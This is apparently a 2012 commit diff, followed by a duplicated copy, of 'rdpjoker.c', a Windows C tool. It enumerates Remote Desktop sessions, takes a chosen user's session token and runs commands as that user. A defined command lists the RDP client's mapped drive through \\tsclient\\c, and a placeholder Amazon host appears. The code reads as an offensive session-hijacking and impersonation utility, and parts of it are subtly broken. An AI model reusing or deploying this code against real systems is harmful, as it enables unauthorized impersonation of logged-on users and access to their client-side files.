truekonrads · July 25, 2012 00:19
diff --git a/rdpjoker.c b/rdpjoker.c
 // rdpjoker.cpp : Defines the entry point for the console application.
 //

 #include "stdafx.h"
 #define SERVER "XXX.compute-1.amazonaws.com"
 #define CMD  "cmd.exe /C dir \\tsclient\\c >output.txt"

 int main(int argc, char **argv){
 	HANDLE server;
 	PWTS_SESSION_INFOA ppSessionInfo=NULL;
 	WTS_SESSION_INFOA pSessionInfo;
 	DWORD pCount;
 	DWORD pLevel=1;
 	DWORD i=0;
 	LPSTR ppBuffer;
 	DWORD bytesReturned;	
 	HANDLE userToken=NULL;
 	HANDLE pUserToken=NULL;
 	ULONG sessionid;
 	DWORD dwCreationFlags=0;
 	LPVOID environment=NULL;
 	STARTUPINFOA si;
 	PROCESS_INFORMATION pi;
 	char *cmdline;
 	char *username;
 	char *homedir;//[MAX_PATH];
 	char desktop[8192];

 	server=WTSOpenServerA(WTS_CURRENT_SERVER_NAME);
 	if(argc>2){
 		sessionid=atol(argv[1]);
 		printf("[*] Impersonating session: %i\n",sessionid);
 		if(WTSQueryUserToken(sessionid,&userToken)){
 			//if(DuplicateTokenEx(userToken,MAXIMUM_ALLOWED,NULL,SecurityIdentification,TokenPrimary,&pUserToken)){
 				if(CreateEnvironmentBlock(&environment,pUserToken,FALSE)){
 					ZeroMemory( &si, sizeof( STARTUPINFO ) );
 					//WTSQuerySessionInformationA(server,sessionid,WTSWinStationName,&ppBuffer,&bytesReturned);
 					//sprintf_s(desktop,8192,"%s\\default",ppBuffer);
 					si.lpDesktop = "winsta0\\default";;
 					si.cb=sizeof(STARTUPINFO);
 					//WTSFreeMemory(ppBuffer);
 					ZeroMemory( &pi,sizeof(pi));
 					cmdline=(char *)malloc(MAX_PATH +1);
 					//GetUserProfileDirectoryA(userToken,homedir,&bytesReturned);
 					//WTSUserConfigTerminalServerProfilePath
 					//WTSQuerySessionInformationA(server,sessionid,WTSUserName,&ppBuffer,&bytesReturned);	
 					WTSQuerySessionInformationA(server,sessionid,WTSUserName,&ppBuffer,&bytesReturned);
 					
 					username=_strdup(ppBuffer);
 					WTSFreeMemory(ppBuffer);
 					//WTSQueryUserConfigA(WTS_CURRENT_SERVER_NAME,username,WTSUserConfigTerminalServerProfilePath,&ppBuffer,&bytesReturned);
 					homedir=(char *)malloc(MAX_PATH);
 					sprintf_s(homedir,MAX_PATH,"C:\\Users\\%s\\",username);
 					//homedir=_strdup(ppBuffer);
 					//WTSFreeMemory(ppBuffer);
 					printf("[D] homedir: %s\n",homedir);
 					sprintf_s(cmdline,MAX_PATH,"cmd.exe /C dir %s >output.txt",argv[2]);
 					dwCreationFlags|= CREATE_UNICODE_ENVIRONMENT | NORMAL_PRIORITY_CLASS | CREATE_NEW_CONSOLE;

 					//WTSQuerySessionInformationA(server,sessionid,WTSWinStationName,&ppBuffer,&bytesReturned);
 					//printf("station: %s",ppBuffer);
 					
 					
 					if(CreateProcessAsUserA(userToken,
 						NULL,
 						cmdline,
 						NULL,
 						NULL,
 						FALSE,
 						dwCreationFlags,
 						environment,
 						homedir,
 						&si,
 						&pi)){
 							printf("[*]CreateProcessAsUserA succeeded! pid:%i, tid:%i\n",pi.dwProcessId,pi.dwProcessId);
 					}else{
 						printf("[E] CreateProcessAsUserA failed: %i\n", GetLastError());
 					}


 				//}else{
 					//printf("[E] CreateEnvironmentBlock failed: %i\n", GetLastError());
 		//		}
 		}else{
 					printf("[E] DuplicateTokenEx failed: %i\n", GetLastError());
 				}


 		}
 		else{
 			printf("[E] WTSQueryUserToken failed: %i\n", GetLastError());
 			exit(-1);
 		}
 	}

 	else{ // no arguments specified
 		if(WTSEnumerateSessionsA(server,0,1,&ppSessionInfo,&pCount)){

 			//	printf("pCount: %i,",pCount);
 			for (i=0;i<pCount;++i){
 				//	printf("i = %i\n",i);
 				pSessionInfo=ppSessionInfo[i];
 				printf("Session ID: %i; name: %s, ",pSessionInfo.SessionId,pSessionInfo.pWinStationName);
 				if(WTSQuerySessionInformationA(server,pSessionInfo.SessionId,WTSUserName,&ppBuffer,&bytesReturned)){
 					printf("user: %s, ",ppBuffer);
 					WTSFreeMemory(ppBuffer);
 				}else{
 					printf("WTSQuerySessionInformation[WTSUserName] failed: %i\n", GetLastError());
 				}
 				if(WTSQuerySessionInformationA(server,pSessionInfo.SessionId,WTSWinStationName,&ppBuffer,&bytesReturned)){
 					printf("station: %s",ppBuffer);
 					WTSFreeMemory(ppBuffer);
 				}else{
 					printf("WTSQuerySessionInformation[WTSWinStationName] failed: %i\n", GetLastError());
 				}
 				printf("\n");
 			}
 			WTSFreeMemory(ppSessionInfo);
 		}else //0014fb3c
 		{
 			printf("EnumerateSessions failed: %i\n", GetLastError());
 		}
 	}
 }
	// rdpjoker.cpp : Defines the entry point for the console application.
	//

	#include "stdafx.h"
	#define SERVER "XXX.compute-1.amazonaws.com"
	#define CMD "cmd.exe /C dir \\tsclient\\c >output.txt"

	int main(int argc, char **argv){
	HANDLE server;
	PWTS_SESSION_INFOA ppSessionInfo=NULL;
	WTS_SESSION_INFOA pSessionInfo;
	DWORD pCount;
	DWORD pLevel=1;
	DWORD i=0;
	LPSTR ppBuffer;
	DWORD bytesReturned;
	HANDLE userToken=NULL;
	HANDLE pUserToken=NULL;
	ULONG sessionid;
	DWORD dwCreationFlags=0;
	LPVOID environment=NULL;
	STARTUPINFOA si;
	PROCESS_INFORMATION pi;
	char *cmdline;
	char *username;
	char *homedir;//[MAX_PATH];
	char desktop[8192];

	server=WTSOpenServerA(WTS_CURRENT_SERVER_NAME);
	if(argc>2){
	sessionid=atol(argv[1]);
	printf("[*] Impersonating session: %i\n",sessionid);
	if(WTSQueryUserToken(sessionid,&userToken)){
	//if(DuplicateTokenEx(userToken,MAXIMUM_ALLOWED,NULL,SecurityIdentification,TokenPrimary,&pUserToken)){
	if(CreateEnvironmentBlock(&environment,pUserToken,FALSE)){
	ZeroMemory( &si, sizeof( STARTUPINFO ) );
	//WTSQuerySessionInformationA(server,sessionid,WTSWinStationName,&ppBuffer,&bytesReturned);
	//sprintf_s(desktop,8192,"%s\\default",ppBuffer);
	si.lpDesktop = "winsta0\\default";;
	si.cb=sizeof(STARTUPINFO);
	//WTSFreeMemory(ppBuffer);
	ZeroMemory( &pi,sizeof(pi));
	cmdline=(char *)malloc(MAX_PATH +1);
	//GetUserProfileDirectoryA(userToken,homedir,&bytesReturned);
	//WTSUserConfigTerminalServerProfilePath
	//WTSQuerySessionInformationA(server,sessionid,WTSUserName,&ppBuffer,&bytesReturned);
	WTSQuerySessionInformationA(server,sessionid,WTSUserName,&ppBuffer,&bytesReturned);

	username=_strdup(ppBuffer);
	WTSFreeMemory(ppBuffer);
	//WTSQueryUserConfigA(WTS_CURRENT_SERVER_NAME,username,WTSUserConfigTerminalServerProfilePath,&ppBuffer,&bytesReturned);
	homedir=(char *)malloc(MAX_PATH);
	sprintf_s(homedir,MAX_PATH,"C:\\Users\\%s\\",username);
	//homedir=_strdup(ppBuffer);
	//WTSFreeMemory(ppBuffer);
	printf("[D] homedir: %s\n",homedir);
	sprintf_s(cmdline,MAX_PATH,"cmd.exe /C dir %s >output.txt",argv[2]);
	dwCreationFlags\|= CREATE_UNICODE_ENVIRONMENT \| NORMAL_PRIORITY_CLASS \| CREATE_NEW_CONSOLE;

	//WTSQuerySessionInformationA(server,sessionid,WTSWinStationName,&ppBuffer,&bytesReturned);
	//printf("station: %s",ppBuffer);


	if(CreateProcessAsUserA(userToken,
	NULL,
	cmdline,
	NULL,
	NULL,
	FALSE,
	dwCreationFlags,
	environment,
	homedir,
	&si,
	&pi)){
	printf("[*]CreateProcessAsUserA succeeded! pid:%i, tid:%i\n",pi.dwProcessId,pi.dwProcessId);
	}else{
	printf("[E] CreateProcessAsUserA failed: %i\n", GetLastError());
	}


	//}else{
	//printf("[E] CreateEnvironmentBlock failed: %i\n", GetLastError());
	// }
	}else{
	printf("[E] DuplicateTokenEx failed: %i\n", GetLastError());
	}


	}
	else{
	printf("[E] WTSQueryUserToken failed: %i\n", GetLastError());
	exit(-1);
	}
	}

	else{ // no arguments specified
	if(WTSEnumerateSessionsA(server,0,1,&ppSessionInfo,&pCount)){

	// printf("pCount: %i,",pCount);
	for (i=0;i<pCount;++i){
	// printf("i = %i\n",i);
	pSessionInfo=ppSessionInfo[i];
	printf("Session ID: %i; name: %s, ",pSessionInfo.SessionId,pSessionInfo.pWinStationName);
	if(WTSQuerySessionInformationA(server,pSessionInfo.SessionId,WTSUserName,&ppBuffer,&bytesReturned)){
	printf("user: %s, ",ppBuffer);
	WTSFreeMemory(ppBuffer);
	}else{
	printf("WTSQuerySessionInformation[WTSUserName] failed: %i\n", GetLastError());
	}
	if(WTSQuerySessionInformationA(server,pSessionInfo.SessionId,WTSWinStationName,&ppBuffer,&bytesReturned)){
	printf("station: %s",ppBuffer);
	WTSFreeMemory(ppBuffer);
	}else{
	printf("WTSQuerySessionInformation[WTSWinStationName] failed: %i\n", GetLastError());
	}
	printf("\n");
	}
	WTSFreeMemory(ppSessionInfo);
	}else //0014fb3c
	{
	printf("EnumerateSessions failed: %i\n", GetLastError());
	}
	}
	}